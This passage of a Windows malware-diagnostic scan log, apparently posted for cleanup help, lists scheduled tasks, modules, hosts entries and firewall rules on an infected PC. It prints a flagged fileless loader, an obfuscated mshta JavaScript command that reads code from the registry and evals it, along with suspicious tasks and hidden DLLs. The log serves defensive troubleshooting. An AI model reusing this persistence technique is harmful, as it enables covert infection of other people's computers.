Task: {8D11FDEC-4359-4D19-B201-23352235A8E0} - \Microsoft\Windows\Setup\gwx\refreshgwxcontent -> No File <==== ATTENTION
Task: {943C6F8C-538C-4330-BD00-804B61854551} - System32\Tasks\DropboxUpdateTaskMachineUA => C:\Program Files (x86)\Dropbox\Update\DropboxUpdate.exe [2016-05-17] (Dropbox, Inc.)
Task: {9CD8C73F-D1E0-401E-9410-39227B26B287} - System32\Tasks\UCBrowserUpdater => C:\Program Files (x86)\UCBrowser\Application\update_task.exe [2016-11-14] (UCWeb Inc) <==== ATTENTION
Task: {A03341EB-33D9-4524-96E2-B09D58DF10D2} - \Microsoft\Windows\Setup\GWXTriggers\Telemetry-4xd -> No File <==== ATTENTION
Task: {A4C3B71B-CCBA-421C-ABD1-F0411668E9F3} - System32\Tasks\Microsoft\Office\Office Automatic Updates => C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeC2RClient.exe [2015-07-04] (Microsoft Corporation)
Task: {AF2A39A3-92CD-458B-B758-CCE5122F5507} - System32\Tasks\UCBrowserUpdaterCore => C:\Program Files (x86)\UCBrowser\Application\update_task.exe [2016-11-14] (UCWeb Inc) <==== ATTENTION
Task: {B012FF16-E0C4-45EE-84CF-01CBBDF4280B} - System32\Tasks\ASUS Splendid ACMON => C:\Program Files (x86)\ASUS\Splendid\ACMON.exe [2014-11-06] (ASUS)
Task: {B77346D1-BB77-4A89-8918-5AC762D5730A} - System32\Tasks\Adobe Flash Player Updater => C:\Windows\SysWOW64\Macromed\Flash\FlashPlayerUpdateService.exe [2016-11-08] (Adobe Systems Incorporated)
Task: {DBEE9E01-0C88-4E81-AB2C-C0FC232B1674} - System32\Tasks\GoogleUpdateTaskUserS-1-5-21-3880736737-1765239813-1450978002-1001UA => C:\Users\taurus silver\AppData\Local\Google\Update\GoogleUpdate.exe [2016-07-29] (Google Inc.)
Task: {E7C7AA33-4484-446C-92C5-C41E68E771D0} - System32\Tasks\{55FE86CA-FBAA-C670-0400-2FA61B21F28E} => C:\Users\TAURUS~1\AppData\Local\{138B2~1\UNINST~1.EXE <==== ATTENTION
Task: {EB253050-93E1-4B69-8D42-821ADFB413CF} - System32\Tasks\ASUS Smart Gesture Launcher => C:\Program Files (x86)\ASUS\ASUS Smart Gesture\AsTPCenter\x64\AsusTPLauncher.exe [2016-03-04] (AsusTek)
Task: {EE4BCC48-ED90-4F31-A174-C72C3F33F1B1} - System32\Tasks\GoogleUpdateTaskUserS-1-5-21-3880736737-1765239813-1450978002-1001Core => C:\Users\taurus silver\AppData\Local\Google\Update\GoogleUpdate.exe [2016-07-29] (Google Inc.)
Task: {EE6AD082-F5FC-4A59-AC60-8D490229822E} - \Microsoft\Windows\Setup\gwx\launchtrayprocess -> No File <==== ATTENTION
Task: {EF670223-6B31-4A5F-A086-851A31916BC6} - System32\Tasks\RtHDVBg => C:\Program Files\Realtek\Audio\HDA\RAVBg64.exe [2016-03-08] (Realtek Semiconductor)
Task: {F57DB565-A472-45F4-97E5-26A56159365C} - \Microsoft\Windows\Setup\GWXTriggers\OutOfSleep-5d -> No File <==== ATTENTION
Task: {F69376A3-8221-4492-A636-02057225E60E} - System32\Tasks\GoogleUpdateTaskMachineCore => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [2015-07-14] (Google Inc.)
Task: {F73A22CB-42C7-4179-9AE0-A13B5103E67E} - System32\Tasks\Microsoft\Office\OfficeTelemetryAgentLogOn2016 => C:\Program Files\Microsoft Office\root\Office16\msoia.exe [2015-08-27] (Microsoft Corporation)
Task: {FE1434C9-3FF0-4C4E-90EE-93BF8B284105} - System32\Tasks\MorseToWords => c:\programdata\{7f5e5b86-f311-b350-7f5e-e5b86f316e1b}\2259928468936697749b.exe <==== ATTENTION
 
(If an entry is included in the fixlist, the task (.job) file will be moved. The file which is running by the task will not be moved.)
 
Task: C:\WINDOWS\Tasks\Adobe Flash Player PPAPI Notifier.job => C:\WINDOWS\SysWOW64\Macromed\Flash\FlashUtil32_23_0_0_207_pepper.exe
Task: C:\WINDOWS\Tasks\Adobe Flash Player Updater.job => C:\Windows\SysWOW64\Macromed\Flash\FlashPlayerUpdateService.exe
Task: C:\WINDOWS\Tasks\DriverToolkit Autorun.job => C:\Program Files (x86)\DriverToolkit\DriverToolkit.exe
Task: C:\WINDOWS\Tasks\DropboxUpdateTaskMachineCore.job => C:\Program Files (x86)\Dropbox\Update\DropboxUpdate.exe
Task: C:\WINDOWS\Tasks\DropboxUpdateTaskMachineUA.job => C:\Program Files (x86)\Dropbox\Update\DropboxUpdate.exe
Task: C:\WINDOWS\Tasks\GoogleUpdateTaskMachineCore.job => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe
Task: C:\WINDOWS\Tasks\GoogleUpdateTaskMachineUA.job => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe
Task: C:\WINDOWS\Tasks\GoogleUpdateTaskUserS-1-5-21-3880736737-1765239813-1450978002-1001Core.job => C:\Users\taurus silver\AppData\Local\Google\Update\GoogleUpdate.exe
Task: C:\WINDOWS\Tasks\GoogleUpdateTaskUserS-1-5-21-3880736737-1765239813-1450978002-1001UA.job => C:\Users\taurus silver\AppData\Local\Google\Update\GoogleUpdate.exe
Task: C:\WINDOWS\Tasks\MorseToWords.job => c:\programdata\{7f5e5b86-f311-b350-7f5e-e5b86f316e1b}\2259928468936697749b.exe <==== ATTENTION
Task: C:\WINDOWS\Tasks\UCBrowserUpdater.job => C:\Program Files (x86)\UCBrowser\Application\update_task.exe <==== ATTENTION
Task: C:\WINDOWS\Tasks\UCBrowserUpdaterCore.job => C:\Program Files (x86)\UCBrowser\Application\update_task.exe <==== ATTENTION
Task: C:\WINDOWS\Tasks\{55FE86CA-FBAA-C670-0400-2FA61B21F28E}.job => 
 
==================== Shortcuts =============================
 
(The entries could be listed to be restored or removed.)
 
Shortcut: C:\Users\taurus silver\AppData\Local\072a96d0\5c23265f.lnk -> C:\Users\taurus silver\AppData\Local\072a96d0\a220feca.bat ()
 
ShortcutWithArgument: C:\Users\taurus silver\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\ImplicitAppShortcuts\5d696d521de238c3\Google Chrome.lnk -> C:\Program Files (x86)\Google\Chrome\Application\chrome.exe (Google Inc.) -> --profile-directory=Default
 
==================== Loaded Modules (Whitelisted) ==============
 
2015-10-30 15:18 - 2015-10-30 15:18 - 00185856 _____ () C:\WINDOWS\SYSTEM32\ism32k.dll
2015-07-14 22:47 - 2015-07-26 11:27 - 01195920 _____ () C:\Program Files (x86)\AVG Web TuneUp\WtuSystemSupport.exe
2015-12-24 12:05 - 2016-03-08 14:42 - 00134712 _____ () C:\Program Files\NVIDIA Corporation\Display\NvSmartMax64.dll
2016-09-28 22:05 - 2016-09-28 22:05 - 00142336 ____H () C:\local64spl.dll
2016-09-28 22:05 - 2016-09-28 22:05 - 00142336 ____H () C:\_\local64spl.dll
2016-09-28 22:05 - 2016-09-28 22:05 - 00142336 ____H () D:\Arduino\local64spl.dll
2016-09-28 22:05 - 2016-09-28 22:05 - 00142336 ____H () D:\_jvm\local64spl.dll
2016-09-28 22:05 - 2016-09-28 22:05 - 00142336 ____H () D:\pendrive\local64spl.dll
2015-08-27 02:33 - 2015-07-04 22:09 - 00160424 _____ () C:\Program Files\Common Files\Microsoft Shared\ClickToRun\ApiClient.dll
2016-05-03 23:03 - 2016-06-15 04:03 - 00367552 _____ () C:\Program Files\NVIDIA Corporation\NvStreamSrv\MessageBus.dll
2016-05-03 23:03 - 2016-06-15 04:03 - 00288192 _____ () C:\Program Files\NVIDIA Corporation\NvStreamSrv\NvStreamBase.dll
2016-05-03 23:03 - 2016-06-15 04:03 - 01147328 _____ () C:\Program Files\NVIDIA Corporation\NvStreamSrv\libprotobuf.dll
2016-05-03 23:03 - 2016-06-15 04:03 - 03611584 _____ () C:\Program Files\NVIDIA Corporation\NvStreamSrv\Poco.dll
2015-05-06 04:23 - 2015-05-06 04:23 - 00418968 _____ () C:\Program Files\Nitro\Pro 10\Nitro_UpdateService.exe
2015-05-06 04:23 - 2015-05-06 04:23 - 02543768 _____ () C:\Program Files\Nitro\Pro 10\Nitro_KissMetrics.dll
2016-06-29 03:26 - 2016-11-14 19:04 - 00629648 _____ () C:\Program Files (x86)\UCBrowser\Application\UCService.exe
2016-05-03 23:03 - 2016-06-15 04:03 - 02665920 _____ () C:\Program Files\NVIDIA Corporation\NvStreamSrv\Plugins\NSS\NvMdnsPlugin.dll
2016-05-03 23:03 - 2016-06-15 04:03 - 01988544 _____ () C:\Program Files\NVIDIA Corporation\NvStreamSrv\Plugins\NSS\NvPortForwardPlugin.dll
2016-05-03 23:03 - 2016-06-15 04:03 - 01840576 _____ () C:\Program Files\NVIDIA Corporation\NvStreamSrv\Plugins\NSS\RtspPlugin.dll
2016-05-03 23:03 - 2016-06-15 04:03 - 00207296 _____ () C:\Program Files\NVIDIA Corporation\NvStreamSrv\RtspServer.dll
2014-10-31 02:57 - 2014-10-31 02:57 - 00016896 _____ () C:\Program Files\ASUS\ASUS FlipLock\FlipController.exe
2016-07-14 09:55 - 2016-07-01 12:48 - 02656408 _____ () C:\WINDOWS\system32\CoreUIComponents.dll
2014-10-31 02:57 - 2014-10-31 02:57 - 00012800 _____ () C:\Program Files\ASUS\ASUS FlipLock\WifiPowerManager.exe
2016-07-14 09:55 - 2016-07-01 12:48 - 02656408 _____ () C:\WINDOWS\System32\CoreUIComponents.dll
2016-08-17 18:51 - 2016-08-17 18:51 - 01864384 _____ () C:\Users\taurus silver\AppData\Local\Microsoft\OneDrive\17.3.6517.0809\amd64\ClientTelemetry.dll
2016-05-14 20:36 - 2016-05-14 20:36 - 00144384 _____ () C:\Program Files\WindowsApps\Microsoft.Messaging_2.15.20002.0_x86__8wekyb3d8bbwe\SkypeHost.exe
2015-12-25 03:52 - 2015-12-25 03:52 - 00093696 _____ () C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\Windows.UI.Shell.SharedUtilities.dll
2016-07-14 09:57 - 2016-07-01 11:48 - 00472064 _____ () C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\QuickActions.dll
2016-07-14 09:55 - 2016-07-01 11:27 - 07992832 _____ () C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\CortanaApi.dll
2016-07-14 09:55 - 2016-07-01 11:21 - 00591360 _____ () C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\Cortana.Core.dll
2016-07-14 09:55 - 2016-07-01 11:22 - 02483200 _____ () C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\Cortana.BackgroundTask.dll
2016-07-14 09:55 - 2016-07-01 11:24 - 04089856 _____ () C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\RemindersUI.dll
2016-05-03 23:03 - 2016-06-15 04:03 - 00034240 _____ () C:\Program Files\NVIDIA Corporation\NvStreamSrv\boost_system-vc120-mt-1_58.dll
2016-05-03 23:03 - 2016-06-15 04:03 - 00920000 _____ () C:\Program Files\NVIDIA Corporation\NvStreamSrv\boost_regex-vc120-mt-1_58.dll
2016-11-17 20:23 - 2016-11-14 19:11 - 02104208 _____ () C:\Program Files (x86)\UCBrowser\Application\5.7.16817.1002\UCAgent.exe
2015-08-27 02:37 - 2015-08-27 02:37 - 08901800 _____ () C:\Program Files\Microsoft Office\root\Office16\1033\GrooveIntlResource.dll
2016-07-30 10:01 - 2016-07-01 14:39 - 00061968 _____ () C:\Program Files (x86)\Autodesk\Autodesk Desktop App\QtSolutions_Service-head.dll
2016-07-30 10:01 - 2016-07-01 14:39 - 00110608 _____ () C:\Program Files (x86)\Autodesk\Autodesk Desktop App\qjson0.dll
2014-10-31 02:57 - 2014-10-31 02:57 - 00009216 _____ () C:\Program Files\ASUS\ASUS FlipLock\WMIProc.dll
2014-11-06 04:44 - 2014-11-06 04:44 - 00037424 _____ () C:\Program Files (x86)\ASUS\Splendid\DetectDisplayDC.dll
2014-11-06 04:44 - 2014-11-06 04:44 - 00124928 _____ () C:\Program Files (x86)\ASUS\Splendid\CCTAdjust.dll
2016-05-14 20:36 - 2016-05-14 20:36 - 00141312 _____ () C:\Program Files\WindowsApps\Microsoft.Messaging_2.15.20002.0_x86__8wekyb3d8bbwe\SkypeBackgroundTasks.dll
2016-05-14 20:36 - 2016-05-14 20:36 - 02941440 _____ () C:\Program Files\WindowsApps\Microsoft.Messaging_2.15.20002.0_x86__8wekyb3d8bbwe\MessagingNativeCore.dll
2016-05-14 20:36 - 2016-05-14 20:36 - 00583168 _____ () C:\Program Files\WindowsApps\Microsoft.Messaging_2.15.20002.0_x86__8wekyb3d8bbwe\MessagingEntityExtractionProxy.dll
2016-05-14 20:36 - 2016-05-14 20:36 - 01300992 _____ () C:\Program Files\WindowsApps\Microsoft.Messaging_2.15.20002.0_x86__8wekyb3d8bbwe\MessagingNativeBase.dll
2016-05-14 20:36 - 2016-05-14 20:36 - 22284800 _____ () C:\Program Files\WindowsApps\Microsoft.Messaging_2.15.20002.0_x86__8wekyb3d8bbwe\SkyWrap.dll
2016-04-23 19:54 - 2016-06-15 04:03 - 00018880 _____ () C:\Program Files (x86)\NVIDIA Corporation\Update Core\detoured.dll
2016-06-04 01:53 - 2016-10-11 00:29 - 00035792 _____ () C:\Program Files (x86)\Dropbox\Client\_multiprocessing.pyd
2016-11-12 03:18 - 2016-10-11 00:29 - 00145864 _____ () C:\Program Files (x86)\Dropbox\Client\pyexpat.pyd
2016-11-12 03:18 - 2016-10-11 00:29 - 00019408 _____ () C:\Program Files (x86)\Dropbox\Client\faulthandler.pyd
2016-11-12 03:18 - 2016-10-11 00:29 - 00116688 _____ () C:\Program Files (x86)\Dropbox\Client\pywintypes27.dll
2016-06-04 01:53 - 2016-10-11 00:29 - 00100296 _____ () C:\Program Files (x86)\Dropbox\Client\_ctypes.pyd
2016-05-17 22:59 - 2016-10-11 00:29 - 00018888 _____ () C:\Program Files (x86)\Dropbox\Client\select.pyd
2016-05-17 22:59 - 2016-11-08 06:59 - 00019760 _____ () C:\Program Files (x86)\Dropbox\Client\tornado.speedups.pyd
2016-05-17 22:59 - 2016-10-11 00:29 - 00694224 _____ () C:\Program Files (x86)\Dropbox\Client\unicodedata.pyd
2016-11-12 03:18 - 2016-11-08 06:58 - 00020816 _____ () C:\Program Files (x86)\Dropbox\Client\cryptography.hazmat.bindings._constant_time.pyd
2016-06-04 01:53 - 2016-10-11 00:30 - 00123856 _____ () C:\Program Files (x86)\Dropbox\Client\_cffi_backend.pyd
2016-11-12 03:18 - 2016-11-08 06:58 - 01682760 _____ () C:\Program Files (x86)\Dropbox\Client\cryptography.hazmat.bindings._openssl.pyd
2016-11-12 03:18 - 2016-11-08 06:58 - 00020808 _____ () C:\Program Files (x86)\Dropbox\Client\cryptography.hazmat.bindings._padding.pyd
2016-05-17 22:59 - 2016-10-11 00:31 - 00105928 _____ () C:\Program Files (x86)\Dropbox\Client\win32api.pyd
2016-08-07 10:04 - 2016-11-08 06:59 - 00021312 _____ () C:\Program Files (x86)\Dropbox\Client\winffi.crt.compiled._winffi_crt.pyd
2016-11-12 03:18 - 2016-11-08 06:59 - 00052024 _____ () C:\Program Files (x86)\Dropbox\Client\psutil._psutil_windows.pyd
2016-11-12 03:18 - 2016-11-08 06:59 - 00038696 _____ () C:\Program Files (x86)\Dropbox\Client\fastpath.pyd
2016-11-12 03:18 - 2016-10-11 00:29 - 00392144 _____ () C:\Program Files (x86)\Dropbox\Client\pythoncom27.dll
2016-11-12 03:18 - 2016-10-11 00:31 - 00020936 _____ () C:\Program Files (x86)\Dropbox\Client\mmapfile.pyd
2016-05-17 22:59 - 2016-10-11 00:31 - 00024528 _____ () C:\Program Files (x86)\Dropbox\Client\win32event.pyd
2016-06-04 01:53 - 2016-10-11 00:31 - 00116176 _____ () C:\Program Files (x86)\Dropbox\Client\win32security.pyd
2016-05-17 22:59 - 2016-11-08 06:59 - 00381752 _____ () C:\Program Files (x86)\Dropbox\Client\win32com.shell.shell.pyd
2016-05-17 22:59 - 2016-10-11 00:31 - 00124880 _____ () C:\Program Files (x86)\Dropbox\Client\win32file.pyd
2016-08-07 10:04 - 2016-11-08 06:59 - 00025424 _____ () C:\Program Files (x86)\Dropbox\Client\winffi.kernel32.compiled._winffi_kernel32.pyd
2016-05-17 22:59 - 2016-10-11 00:31 - 00024016 _____ () C:\Program Files (x86)\Dropbox\Client\win32clipboard.pyd
2016-05-17 22:59 - 2016-10-11 00:31 - 00175560 _____ () C:\Program Files (x86)\Dropbox\Client\win32gui.pyd
2016-05-17 22:59 - 2016-10-11 00:31 - 00030160 _____ () C:\Program Files (x86)\Dropbox\Client\win32pipe.pyd
2016-05-17 22:59 - 2016-10-11 00:31 - 00043472 _____ () C:\Program Files (x86)\Dropbox\Client\win32process.pyd
2016-06-04 01:53 - 2016-10-11 00:31 - 00048592 _____ () C:\Program Files (x86)\Dropbox\Client\win32service.pyd
2016-05-17 22:59 - 2016-10-11 00:31 - 00057808 _____ () C:\Program Files (x86)\Dropbox\Client\win32evtlog.pyd
2016-05-17 22:59 - 2016-10-11 00:31 - 00024016 _____ () C:\Program Files (x86)\Dropbox\Client\win32profile.pyd
2016-11-12 03:18 - 2016-11-08 06:58 - 00246592 _____ () C:\Program Files (x86)\Dropbox\Client\breakpad.client.windows.handler.pyd
2016-11-12 03:18 - 2016-11-08 06:59 - 00026456 _____ () C:\Program Files (x86)\Dropbox\Client\dropbox.infinite.win.compiled._driverinstallation.pyd
2016-08-07 10:04 - 2016-10-11 00:30 - 00241104 _____ () C:\Program Files (x86)\Dropbox\Client\_jpegtran.pyd
2016-11-12 03:18 - 2016-11-08 06:58 - 00020280 _____ () C:\Program Files (x86)\Dropbox\Client\cpuid.compiled._cpuid.pyd
2016-06-04 01:53 - 2016-10-11 00:31 - 00028616 _____ () C:\Program Files (x86)\Dropbox\Client\win32ts.pyd
2016-06-04 01:53 - 2016-11-08 06:59 - 00023376 _____ () C:\Program Files (x86)\Dropbox\Client\winscreenshot.compiled._CaptureScreenshot.pyd
2016-06-04 01:53 - 2016-11-08 06:59 - 00020800 _____ () C:\Program Files (x86)\Dropbox\Client\winffi.iphlpapi._winffi_iphlpapi.pyd
2016-06-04 01:53 - 2016-11-08 06:59 - 00019776 _____ () C:\Program Files (x86)\Dropbox\Client\winffi.winerror._winffi_winerror.pyd
2016-06-04 01:53 - 2016-11-08 06:59 - 00020800 _____ () C:\Program Files (x86)\Dropbox\Client\winffi.wininet._winffi_wininet.pyd
2016-06-04 01:53 - 2016-10-11 00:31 - 00350152 _____ () C:\Program Files (x86)\Dropbox\Client\winxpgui.pyd
2016-06-04 01:53 - 2016-11-08 06:59 - 00022352 _____ () C:\Program Files (x86)\Dropbox\Client\winverifysignature.compiled._VerifySignature.pyd
2016-11-12 03:18 - 2016-11-08 06:59 - 00024392 _____ () C:\Program Files (x86)\Dropbox\Client\librsyncffi.compiled._librsyncffi.pyd
2016-11-12 03:18 - 2016-10-11 00:27 - 00036296 _____ () C:\Program Files (x86)\Dropbox\Client\librsync.dll
2016-11-12 03:18 - 2016-11-08 06:59 - 00031568 _____ () C:\Program Files (x86)\Dropbox\Client\enterprise_data.compiled._enterprise_data.pyd
2016-11-12 03:18 - 2016-11-08 06:49 - 00293392 _____ () C:\Program Files (x86)\Dropbox\Client\EnterpriseDataAdapter.dll
2016-11-12 03:18 - 2016-11-08 06:59 - 00084280 _____ () C:\Program Files (x86)\Dropbox\Client\dropbox_sqlite_ext.DLL
2016-11-12 03:18 - 2016-11-08 06:59 - 01826096 _____ () C:\Program Files (x86)\Dropbox\Client\PyQt5.QtCore.pyd
2016-05-17 22:59 - 2016-10-11 00:29 - 00083912 _____ () C:\Program Files (x86)\Dropbox\Client\sip.pyd
2016-11-12 03:18 - 2016-11-08 06:59 - 00531248 _____ () C:\Program Files (x86)\Dropbox\Client\PyQt5.QtNetwork.pyd
2016-11-12 03:18 - 2016-11-08 06:59 - 03928880 _____ () C:\Program Files (x86)\Dropbox\Client\PyQt5.QtWidgets.pyd
2016-11-12 03:18 - 2016-11-08 06:59 - 01972528 _____ () C:\Program Files (x86)\Dropbox\Client\PyQt5.QtGui.pyd
2016-11-12 03:18 - 2016-11-08 06:59 - 00133424 _____ () C:\Program Files (x86)\Dropbox\Client\PyQt5.QtWebKit.pyd
2016-11-12 03:18 - 2016-11-08 06:59 - 00224056 _____ () C:\Program Files (x86)\Dropbox\Client\PyQt5.QtWebKitWidgets.pyd
2016-11-12 03:18 - 2016-11-08 06:59 - 00207672 _____ () C:\Program Files (x86)\Dropbox\Client\PyQt5.QtPrintSupport.pyd
2016-08-07 10:04 - 2016-11-08 06:59 - 00020288 _____ () C:\Program Files (x86)\Dropbox\Client\winffi.user32._winffi_user32.pyd
2016-11-12 03:18 - 2016-10-11 00:33 - 00017864 _____ () C:\Program Files (x86)\Dropbox\Client\libEGL.dll
2016-11-12 03:18 - 2016-10-11 00:34 - 01631184 _____ () C:\Program Files (x86)\Dropbox\Client\libGLESv2.dll
2016-11-12 03:18 - 2016-11-08 06:59 - 00042808 _____ () C:\Program Files (x86)\Dropbox\Client\PyQt5.QtWebChannel.pyd
2016-11-12 03:18 - 2016-11-08 06:59 - 00168760 _____ () C:\Program Files (x86)\Dropbox\Client\PyQt5.QtWebEngineWidgets.pyd
2016-11-12 03:18 - 2016-11-08 06:59 - 00357680 _____ () C:\Program Files (x86)\Dropbox\Client\PyQt5.QtQml.pyd
2016-06-04 01:53 - 2016-11-08 06:59 - 00037192 _____ () C:\Program Files (x86)\Dropbox\Client\windisplaytoast.compiled._DisplayToast.pyd
2016-08-07 10:04 - 2016-11-08 06:59 - 00024904 _____ () C:\Program Files (x86)\Dropbox\Client\winffi.winhttp.compiled._winffi_winhttp.pyd
2016-05-17 22:59 - 2016-10-11 00:31 - 00060880 _____ () C:\Program Files (x86)\Dropbox\Client\win32print.pyd
2016-11-12 03:18 - 2016-11-08 06:59 - 00546096 _____ () C:\Program Files (x86)\Dropbox\Client\PyQt5.QtQuick.pyd
2014-09-04 03:03 - 2014-09-04 03:03 - 01241560 _____ () C:\Program Files (x86)\Intel\Intel® Management Engine Components\LMS\ACE.dll
 
==================== Alternate Data Streams (Whitelisted) =========
 
(If an entry is included in the fixlist, only the ADS will be removed.)
 
AlternateDataStreams: C:\ProgramData\Reprise:wupeogjxldtlfudivq`qsp`27hfm [0]
AlternateDataStreams: C:\ProgramData\TEMP:85E5F208 [129]
 
==================== Safe Mode (Whitelisted) ===================
 
(If an entry is included in the fixlist, it will be removed from the registry. The "AlternateShell" will be restored.)
 
 
==================== Association (Whitelisted) ===============
 
(If an entry is included in the fixlist, the registry item will be restored to default or removed.)
 
HKU\S-1-5-21-3880736737-1765239813-1450978002-1001\Software\Classes\.scr: AutoCADScriptFile => C:\WINDOWS\system32\notepad.exe "%1"
HKU\S-1-5-21-3880736737-1765239813-1450978002-1001\Software\Classes\c5baa48d: "C:\WINDOWS\system32\mshta.exe" "javascript:R7doxY="ztyy";xk63=new ActiveXObject("WScript.Shell");e2hCK1YSQ="RaSIwNRm";y45hym=xk63.RegRead("HKCU\\software\\jvjtduhgj\\cdweuob");x2fbl="W1";eval(y45hym);u8ATtgjn="40kEBhbe";" <===== ATTENTION
 
==================== Internet Explorer trusted/restricted ===============
 
(If an entry is included in the fixlist, it will be removed from the registry.)
 
IE trusted site: HKU\S-1-5-21-3880736737-1765239813-1450978002-1001\...\aeriagames.com -> hxxps://aeriagames.com
IE trusted site: HKU\S-1-5-21-3880736737-1765239813-1450978002-1001\...\aeriagames.com -> hxxp://aeriagames.com
IE trusted site: HKU\S-1-5-21-3880736737-1765239813-1450978002-1001\...\clonewarsadventures.com -> clonewarsadventures.com
IE trusted site: HKU\S-1-5-21-3880736737-1765239813-1450978002-1001\...\freerealms.com -> freerealms.com
IE trusted site: HKU\S-1-5-21-3880736737-1765239813-1450978002-1001\...\soe.com -> soe.com
IE trusted site: HKU\S-1-5-21-3880736737-1765239813-1450978002-1001\...\sony.com -> sony.com
 
==================== Hosts content: ==========================
 
(If needed Hosts: directive could be included in the fixlist to reset Hosts.)
 
2013-08-22 21:25 - 2016-06-15 03:02 - 00002183 ___RA C:\WINDOWS\system32\Drivers\etc\hosts
 
127.0.0.1 lm.auslogics.com
127.0.0.1                   anchorfree.net
127.0.0.1                   rss2search.com
127.0.0.1                   techbrowsing.com
127.0.0.1                   box.anchorfree.net
127.0.0.1                   www.mefeedia.com
127.0.0.3                   www.anchorfree.net
127.0.0.2                   www.mefeedia.com
127.0.0.1                   anchorfree.us
127.0.0.1                   a433.com
127.0.0.3                   anchorfree.net
127.0.0.1                   rpt.anchorfree.net
127.0.0.1                   delivery.anchorfree.us/land.php
127.0.0.1                   hsselite.com
127.0.0.1                   www.hsselite.com
127.0.0.1                   anchorfree.net
127.0.0.1                   rss2search.com
127.0.0.1                   techbrowsing.com
127.0.0.1                   box.anchorfree.net
127.0.0.1                   www.mefeedia.com
127.0.0.3                   www.anchorfree.net
127.0.0.2                   www.mefeedia.com
127.0.0.1                   anchorfree.us
127.0.0.1                   a433.com
127.0.0.3                   anchorfree.net
127.0.0.1                   rpt.anchorfree.net
127.0.0.1                   delivery.anchorfree.us/land.php
127.0.0.1                   hsselite.com
127.0.0.1                   www.hsselite.com
127.0.0.1                   idb.iobit.com
 
==================== Other Areas ============================
 
(Currently there is no automatic fix for this section.)
 
HKU\S-1-5-21-3880736737-1765239813-1450978002-1001\Control Panel\Desktop\\Wallpaper -> C:\Users\taurus silver\AppData\Roaming\Microsoft\Windows\Themes\TranscodedWallpaper
DNS Servers: 8.8.8.8 - 8.8.4.4
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System => (ConsentPromptBehaviorAdmin: 5) (ConsentPromptBehaviorUser: 3) (EnableLUA: 1)
Windows Firewall is disabled.
 
==================== MSCONFIG/TASK MANAGER disabled items ==
 
HKLM\...\StartupApproved\StartupFolder: => "SoftEther VPN Client Manager Startup.lnk"
HKLM\...\StartupApproved\Run: => "SpywareTerminatorShield"
HKLM\...\StartupApproved\Run: => "SpywareTerminatorUpdater"
HKLM\...\StartupApproved\Run: => "NoVirusThanks Driver Radar Pro Startup"
HKLM\...\StartupApproved\Run: => "Greenshot"
HKLM\...\StartupApproved\Run: => "SoftEther VPN Client UI Helper"
HKLM\...\StartupApproved\Run32: => "WebStorage"
HKLM\...\StartupApproved\Run32: => "Aeria Ignite"
HKLM\...\StartupApproved\Run32: => "DLLSuite2016"
HKLM\...\StartupApproved\Run32: => "Autodesk Desktop App"
HKLM\...\StartupApproved\Run32: => "ProductUpdater"
HKU\S-1-5-21-3880736737-1765239813-1450978002-1001\...\StartupApproved\StartupFolder: => "Send to OneNote.lnk"
HKU\S-1-5-21-3880736737-1765239813-1450978002-1001\...\StartupApproved\Run: => "IDMan"
HKU\S-1-5-21-3880736737-1765239813-1450978002-1001\...\StartupApproved\Run: => "Internet Download Accelerator"
HKU\S-1-5-21-3880736737-1765239813-1450978002-1001\...\StartupApproved\Run: => "Steam"
HKU\S-1-5-21-3880736737-1765239813-1450978002-1001\...\StartupApproved\Run: => "BitTorrent"
HKU\S-1-5-21-3880736737-1765239813-1450978002-1001\...\StartupApproved\Run: => "Office Timeline Performance Helper"
HKU\S-1-5-21-3880736737-1765239813-1450978002-1001\...\StartupApproved\Run: => "DAEMON Tools Lite"
HKU\S-1-5-21-3880736737-1765239813-1450978002-1001\...\StartupApproved\Run: => "OneDrive"
HKU\S-1-5-21-3880736737-1765239813-1450978002-1001\...\StartupApproved\Run: => "uTorrent"
 
==================== FirewallRules (Whitelisted) ===============
 
(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)
 
FirewallRules: [TCP Query User{887A3FD3-A10C-4CB4-8DD1-6F37C30AEBE9}C:\users\taurus silver\appdata\local\akamai\netsession_win.exe] => (Allow) C:\users\taurus silver\appdata\local\akamai\netsession_win.exe
FirewallRules: [UDP Query User{93FBF7DA-2CEA-4E35-AF68-64C374595AD3}C:\users\taurus silver\appdata\local\akamai\netsession_win.exe] => (Allow) C:\users\taurus silver\appdata\local\akamai\netsession_win.exe
FirewallRules: [TCP Query User{D50B5078-5C7C-48CA-907A-709402E6CC27}C:\users\taurus silver\appdata\local\akamai\netsession_win.exe] => (Allow) C:\users\taurus silver\appdata\local\akamai\netsession_win.exe
FirewallRules: [UDP Query User{70739D13-09C1-4910-89D1-AE1AB71D23F1}C:\users\taurus silver\appdata\local\akamai\netsession_win.exe] => (Allow) C:\users\taurus silver\appdata\local\akamai\netsession_win.exe
FirewallRules: [{F133B81F-8907-4A14-9EFE-21ED1B4CF585}] => (Allow) C:\Program Files (x86)\IObit\Driver Booster\DriverBooster.exe
FirewallRules: [{2768CB42-D446-4479-A771-22D2E0FB52CB}] => (Allow) C:\Program Files (x86)\IObit\Driver Booster\DriverBooster.exe
FirewallRules: [{8D8EDAA9-330E-4CE2-B3BF-231C86E8F106}] => (Allow) C:\Program Files (x86)\IObit\Driver Booster\DBDownloader.exe
FirewallRules: [{EEF6CBA0-260A-42AC-A9B7-8FF05F2B92C9}] => (Allow) C:\Program Files (x86)\IObit\Driver Booster\DBDownloader.exe
FirewallRules: [{C299E124-6805-492B-9B96-E75D160A883E}] => (Allow) C:\Program Files (x86)\IObit\Driver Booster\AutoUpdate.exe
FirewallRules: [{21B246E5-A029-48D6-8C66-59DA57723C2C}] => (Allow) C:\Program Files (x86)\IObit\Driver Booster\AutoUpdate.exe
FirewallRules: [{52B7BA61-E441-4C49-8308-DCCBF21BC688}] => (Allow) C:\Program Files (x86)\Steam\Steam.exe
